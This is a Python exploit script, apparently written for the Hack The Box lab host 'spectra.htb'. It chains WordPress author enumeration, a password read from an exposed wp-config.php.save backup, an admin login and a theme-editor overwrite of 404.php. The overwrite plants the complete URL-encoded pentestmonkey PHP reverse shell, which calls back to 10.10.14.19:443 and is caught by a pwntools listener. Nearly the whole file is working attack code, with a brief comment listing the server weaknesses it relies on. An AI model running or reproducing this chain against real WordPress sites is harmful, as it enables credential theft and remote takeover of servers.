
#!/usr/bin/python3

import requests
import re
import signal
import time
import sys
import pdb
import urllib.parse
import threading

from pwn import *

def def_handler(sig, frame):
    """SIGINT handler: print the exit banner and stop the interpreter with status 1.

    Args:
        sig: signal number delivered by the runtime (unused).
        frame: interrupted stack frame (unused).

    Raises:
        SystemExit: always, with exit code 1.
    """
    print("\n[!] Saliendo...\n")
    raise SystemExit(1)

# Ctrl+C -> def_handler prints a banner and exits with status 1
signal.signal(signal.SIGINT, def_handler)

# Global variables: every endpoint is hard-coded to the spectra.htb host (HTB lab target)
login_wordpress_url = "http://spectra.htb/main/wp-login.php"
rce_wordpress_url = "http://spectra.htb/main/wp-content/themes/twentynineteen/404.php" # RCE: theme file that makeRequest overwrites and then fetches
backup_wordpress_config = "http://spectra.htb/testing/wp-config.php.save" # backup copy of wp-config.php left readable inside the web root; makeRequest reads DB_PASSWORD from it
user_wordpress_url = "http://spectra.htb/main/?author=1" # Administrator: author archive used for username enumeration
file_upload_url = "http://spectra.htb/main/wp-admin/admin-ajax.php" # AJAX endpoint behind the built-in theme editor's save action
get_nonce_value = "http://spectra.htb/main/wp-admin/theme-editor.php?file=404.php&theme=twentynineteen" # nonce: page whose form carries the CSRF token for that save
lport = 443  # local listener port; mirrors the $port value embedded in the PHP literal inside makeRequest

# requests-style proxies dict for Burp; defined but never passed to any request below
burp = {'http': 'http://127.0.0.1:8080'}

def makeRequest():
    """Run the HTTP side of the chain against the module-level spectra.htb URLs.

    Steps, all on one requests session and none of them checked for success:
      1. GET the author archive and pull the username out of the ``vcard`` markup;
      2. GET the exposed ``wp-config.php.save`` and pull the ``DB_PASSWORD`` value,
         which is then reused as the WordPress login password;
      3. GET then POST wp-login.php with those credentials;
      4. GET theme-editor.php and extract the ``nonce`` form value;
      5. POST admin-ajax.php ``edit-theme-plugin-file`` to replace the theme's 404.php
         with the decoded PHP held in ``filename``;
      6. GET the rewritten 404.php so the server runs it.

    Each ``re.findall(...)[0]`` raises IndexError when its pattern is absent, so a
    failed step kills the worker thread with a traceback rather than a message;
    the caller in ``__main__`` only notices via the listener timeout.

    Defensive reading: steps 1, 2 and 5 each rest on a separate server-side
    weakness -- author enumeration, a config backup served from the web root,
    and the theme editor being enabled (``DISALLOW_FILE_EDIT`` unset) for the
    recovered account.
    """

    # one session so the auth cookies set by the login POST carry into the later admin requests
    s = requests.session()
    r = s.get(user_wordpress_url)

    username = re.findall(r'class="vcard">(.*?)<', r.text)[0] # Administrator (first vcard match, unchecked)

    r = s.get(backup_wordpress_config)

    password = re.findall(r"'DB_PASSWORD', '(.*?)'", r.text)[0] # Password: DB credential reused for the WP login

    # browser-like User-Agent; only sent on the login POST below
    headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36'}

    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': 'http://spectra.htb/main/wp-admin/',
        'testcookie': '1'
    }

    # priming GET so the test cookie exists; the session already stores it, so the
    # explicit cookies= argument on the POST is redundant
    r = s.get(login_wordpress_url)
    cookies = dict(r.cookies)

    r = s.post(login_wordpress_url, data=login_data, cookies=cookies, headers=headers)
    r = s.get(get_nonce_value)

    # CSRF token the theme-editor save action requires; only present when the login succeeded
    nonce = re.findall(r'name="nonce" value="(.*?)"', r.text)[0]

    # Misnamed: this is the new *content* for 404.php, not a filename. It is the
    # pentestmonkey PHP reverse shell (GPLv2 header included), form-URL-encoded, with
    # the callback host/port hard-coded inside the literal ('10.10.14.19', 443).
    filename = "%3C%3Fphp%0A%2F%2F+php-reverse-shell+-+A+Reverse+Shell+implementation+in+PHP%0A%2F%2F+Copyright+(C)+2007+pentestmonkey%40pentestmonkey.net%0A%2F%2F%0A%2F%2F+This+tool+may+be+used+for+legal+purposes+only.++Users+take+full+responsibility%0A%2F%2F+for+any+actions+performed+using+this+tool.++The+author+accepts+no+liability%0A%2F%2F+for+damage+caused+by+this+tool.++If+these+terms+are+not+acceptable+to+you%2C+then%0A%2F%2F+do+not+use+this+tool.%0A%2F%2F%0A%2F%2F+In+all+other+respects+the+GPL+version+2+applies%3A%0A%2F%2F%0A%2F%2F+This+program+is+free+software%3B+you+can+redistribute+it+and%2For+modify%0A%2F%2F+it+under+the+terms+of+the+GNU+General+Public+License+version+2+as%0A%2F%2F+published+by+the+Free+Software+Foundation.%0A%2F%2F%0A%2F%2F+This+program+is+distributed+in+the+hope+that+it+will+be+useful%2C%0A%2F%2F+but+WITHOUT+ANY+WARRANTY%3B+without+even+the+implied+warranty+of%0A%2F%2F+MERCHANTABILITY+or+FITNESS+FOR+A+PARTICULAR+PURPOSE.++See+the%0A%2F%2F+GNU+General+Public+License+for+more+details.%0A%2F%2F%0A%2F%2F+You+should+have+received+a+copy+of+the+GNU+General+Public+License+along%0A%2F%2F+with+this+program%3B+if+not%2C+write+to+the+Free+Software+Foundation%2C+Inc.%2C%0A%2F%2F+51+Franklin+Street%2C+Fifth+Floor%2C+Boston%2C+MA+02110-1301+USA.%0A%2F%2F%0A%2F%2F+This+tool+may+be+used+for+legal+purposes+only.++Users+take+full+responsibility%0A%2F%2F+for+any+actions+performed+using+this+tool.++If+these+terms+are+not+acceptable+to%0A%2F%2F+you%2C+then+do+not+use+this+tool.%0A%2F%2F%0A%2F%2F+You+are+encouraged+to+send+comments%2C+improvements+or+suggestions+to%0A%2F%2F+me+at+pentestmonkey%40pentestmonkey.net%0A%2F%2F%0A%2F%2F+Description%0A%2F%2F+-----------%0A%2F%2F+This+script+will+make+an+outbound+TCP+connection+to+a+hardcoded+IP+and+port.%0A%2F%2F+The+recipient+will+be+given+a+shell+running+as+the+current+user+(apache+normally).%0A%2F%2F%0A%2F%2F+Limitations%0A%2F%2F+-----------%0A%2F%2F+proc_open+and+stream_set_blocking+require+PHP+version+4.3%2B%2C+or+5%2B%0A%2F%2F+Use+of+stream_select()+on+file+descriptors+returned+by+proc_open()+will+fail+and+return+FALSE+under+Windows.%0A%2F%2F+Some+compile-time+options+are+needed+for+daemonisation+(like+pcntl%2C+posix).++These+are+rarely+available.%0A%2F%2F%0A%2F%2F+Usage%0A%2F%2F+-----%0A%2F%2F+See+http%3A%2F%2Fpentestmonkey.net%2Ftools%2Fphp-reverse-shell+if+you+get+stuck.%0A%0Aset_time_limit+(0)%3B%0A%24VERSION+%3D+%221.0%22%3B%0A%24ip+%3D+'10.10.14.19'%3B++%2F%2F+CHANGE+THIS%0A%24port+%3D+443%3B+++++++%2F%2F+CHANGE+THIS%0A%24chunk_size+%3D+1400%3B%0A%24write_a+%3D+null%3B%0A%24error_a+%3D+null%3B%0A%24shell+%3D+'uname+-a%3B+w%3B+id%3B+%2Fbin%2Fsh+-i'%3B%0A%24daemon+%3D+0%3B%0A%24debug+%3D+0%3B%0A%0A%2F%2F%0A%2F%2F+Daemonise+ourself+if+possible+to+avoid+zombies+later%0A%2F%2F%0A%0A%2F%2F+pcntl_fork+is+hardly+ever+available%2C+but+will+allow+us+to+daemonise%0A%2F%2F+our+php+process+and+avoid+zombies.++Worth+a+try...%0Aif+(function_exists('pcntl_fork'))+%7B%0A%09%2F%2F+Fork+and+have+the+parent+process+exit%0A%09%24pid+%3D+pcntl_fork()%3B%0A%09%0A%09if+(%24pid+%3D%3D+-1)+%7B%0A%09%09printit(%22ERROR%3A+Can't+fork%22)%3B%0A%09%09exit(1)%3B%0A%09%7D%0A%09%0A%09if+(%24pid)+%7B%0A%09%09exit(0)%3B++%2F%2F+Parent+exits%0A%09%7D%0A%0A%09%2F%2F+Make+the+current+process+a+session+leader%0A%09%2F%2F+Will+only+succeed+if+we+forked%0A%09if+(posix_setsid()+%3D%3D+-1)+%7B%0A%09%09printit(%22Error%3A+Can't+setsid()%22)%3B%0A%09%09exit(1)%3B%0A%09%7D%0A%0A%09%24daemon+%3D+1%3B%0A%7D+else+%7B%0A%09printit(%22WARNING%3A+Failed+to+daemonise.++This+is+quite+common+and+not+fatal.%22)%3B%0A%7D%0A%0A%2F%2F+Change+to+a+safe+directory%0Achdir(%22%2F%22)%3B%0A%0A%2F%2F+Remove+any+umask+we+inherited%0Aumask(0)%3B%0A%0A%2F%2F%0A%2F%2F+Do+the+reverse+shell...%0A%2F%2F%0A%0A%2F%2F+Open+reverse+connection%0A%24sock+%3D+fsockopen(%24ip%2C+%24port%2C+%24errno%2C+%24errstr%2C+30)%3B%0Aif+(!%24sock)+%7B%0A%09printit(%22%24errstr+(%24errno)%22)%3B%0A%09exit(1)%3B%0A%7D%0A%0A%2F%2F+Spawn+shell+process%0A%24descriptorspec+%3D+array(%0A+++0+%3D%3E+array(%22pipe%22%2C+%22r%22)%2C++%2F%2F+stdin+is+a+pipe+that+the+child+will+read+from%0A+++1+%3D%3E+array(%22pipe%22%2C+%22w%22)%2C++%2F%2F+stdout+is+a+pipe+that+the+child+will+write+to%0A+++2+%3D%3E+array(%22pipe%22%2C+%22w%22)+++%2F%2F+stderr+is+a+pipe+that+the+child+will+write+to%0A)%3B%0A%0A%24process+%3D+proc_open(%24shell%2C+%24descriptorspec%2C+%24pipes)%3B%0A%0Aif+(!is_resource(%24process))+%7B%0A%09printit(%22ERROR%3A+Can't+spawn+shell%22)%3B%0A%09exit(1)%3B%0A%7D%0A%0A%2F%2F+Set+everything+to+non-blocking%0A%2F%2F+Reason%3A+Occsionally+reads+will+block%2C+even+though+stream_select+tells+us+they+won't%0Astream_set_blocking(%24pipes%5B0%5D%2C+0)%3B%0Astream_set_blocking(%24pipes%5B1%5D%2C+0)%3B%0Astream_set_blocking(%24pipes%5B2%5D%2C+0)%3B%0Astream_set_blocking(%24sock%2C+0)%3B%0A%0Aprintit(%22Successfully+opened+reverse+shell+to+%24ip%3A%24port%22)%3B%0A%0Awhile+(1)+%7B%0A%09%2F%2F+Check+for+end+of+TCP+connection%0A%09if+(feof(%24sock))+%7B%0A%09%09printit(%22ERROR%3A+Shell+connection+terminated%22)%3B%0A%09%09break%3B%0A%09%7D%0A%0A%09%2F%2F+Check+for+end+of+STDOUT%0A%09if+(feof(%24pipes%5B1%5D))+%7B%0A%09%09printit(%22ERROR%3A+Shell+process+terminated%22)%3B%0A%09%09break%3B%0A%09%7D%0A%0A%09%2F%2F+Wait+until+a+command+is+end+down+%24sock%2C+or+some%0A%09%2F%2F+command+output+is+available+on+STDOUT+or+STDERR%0A%09%24read_a+%3D+array(%24sock%2C+%24pipes%5B1%5D%2C+%24pipes%5B2%5D)%3B%0A%09%24num_changed_sockets+%3D+stream_select(%24read_a%2C+%24write_a%2C+%24error_a%2C+null)%3B%0A%0A%09%2F%2F+If+we+can+read+from+the+TCP+socket%2C+send%0A%09%2F%2F+data+to+process's+STDIN%0A%09if+(in_array(%24sock%2C+%24read_a))+%7B%0A%09%09if+(%24debug)+printit(%22SOCK+READ%22)%3B%0A%09%09%24input+%3D+fread(%24sock%2C+%24chunk_size)%3B%0A%09%09if+(%24debug)+printit(%22SOCK%3A+%24input%22)%3B%0A%09%09fwrite(%24pipes%5B0%5D%2C+%24input)%3B%0A%09%7D%0A%0A%09%2F%2F+If+we+can+read+from+the+process's+STDOUT%0A%09%2F%2F+send+data+down+tcp+connection%0A%09if+(in_array(%24pipes%5B1%5D%2C+%24read_a))+%7B%0A%09%09if+(%24debug)+printit(%22STDOUT+READ%22)%3B%0A%09%09%24input+%3D+fread(%24pipes%5B1%5D%2C+%24chunk_size)%3B%0A%09%09if+(%24debug)+printit(%22STDOUT%3A+%24input%22)%3B%0A%09%09fwrite(%24sock%2C+%24input)%3B%0A%09%7D%0A%0A%09%2F%2F+If+we+can+read+from+the+process's+STDERR%0A%09%2F%2F+send+data+down+tcp+connection%0A%09if+(in_array(%24pipes%5B2%5D%2C+%24read_a))+%7B%0A%09%09if+(%24debug)+printit(%22STDERR+READ%22)%3B%0A%09%09%24input+%3D+fread(%24pipes%5B2%5D%2C+%24chunk_size)%3B%0A%09%09if+(%24debug)+printit(%22STDERR%3A+%24input%22)%3B%0A%09%09fwrite(%24sock%2C+%24input)%3B%0A%09%7D%0A%7D%0A%0Afclose(%24sock)%3B%0Afclose(%24pipes%5B0%5D)%3B%0Afclose(%24pipes%5B1%5D)%3B%0Afclose(%24pipes%5B2%5D)%3B%0Aproc_close(%24process)%3B%0A%0A%2F%2F+Like+print%2C+but+does+nothing+if+we've+daemonised+ourself%0A%2F%2F+(I+can't+figure+out+how+to+redirect+STDOUT+like+a+proper+daemon)%0Afunction+printit+(%24string)+%7B%0A%09if+(!%24daemon)+%7B%0A%09%09print+%22%24string%5Cn%22%3B%0A%09%7D%0A%7D%0A%0A%3F%3E"

    # Decode the form encoding: %XX escapes first, then '+' -> space. Doing it in
    # this order (rather than unquote_plus) also turns the two '%2B' escapes in the
    # literal into spaces after decoding; they sit inside a PHP comment, so harmless here.
    filename = urllib.parse.unquote(filename).replace('+', ' ')

    # form fields of the theme editor's save request; 'newcontent' is the decoded PHP
    data_file_to_upload = {
        'nonce': nonce,
        '_wp_http_referer': '/main/wp-admin/theme-editor.php?file=404.php&theme=twentynineteen',
        'newcontent': filename,
        'action': 'edit-theme-plugin-file',
        'file': '404.php',
        'theme': 'twentynineteen',
        'docs-list': ''
    }

    # File upload: rewrites the theme's 404.php; only works while the theme editor is enabled for this role
    r = s.post(file_upload_url, data=data_file_to_upload)
    # Remote Command Execution: requesting the rewritten 404.php runs it; the response
    # (and every status code above) is never inspected
    r = s.get(rce_wordpress_url)

if __name__ == '__main__':

    # Run the HTTP chain in a worker thread so the listener below is already up when
    # the server-side PHP calls back. The try/except only covers Thread creation and
    # start(); anything makeRequest raises surfaces in that thread, not here.
    try:
        threading.Thread(target=makeRequest, args=()).start()
    except Exception as e:
        log.error(str(e))  # pwntools logger (from pwn import *)

    # pwntools listener on lport (443 here, so binding needs the usual privileges);
    # wait_for_connection gives up after 20 s
    shell = listen(lport, timeout=20).wait_for_connection()

    # hand the accepted connection to the terminal; if the wait timed out this call
    # presumably fails instead of reporting the timeout -- confirm against pwntools
    shell.interactive()
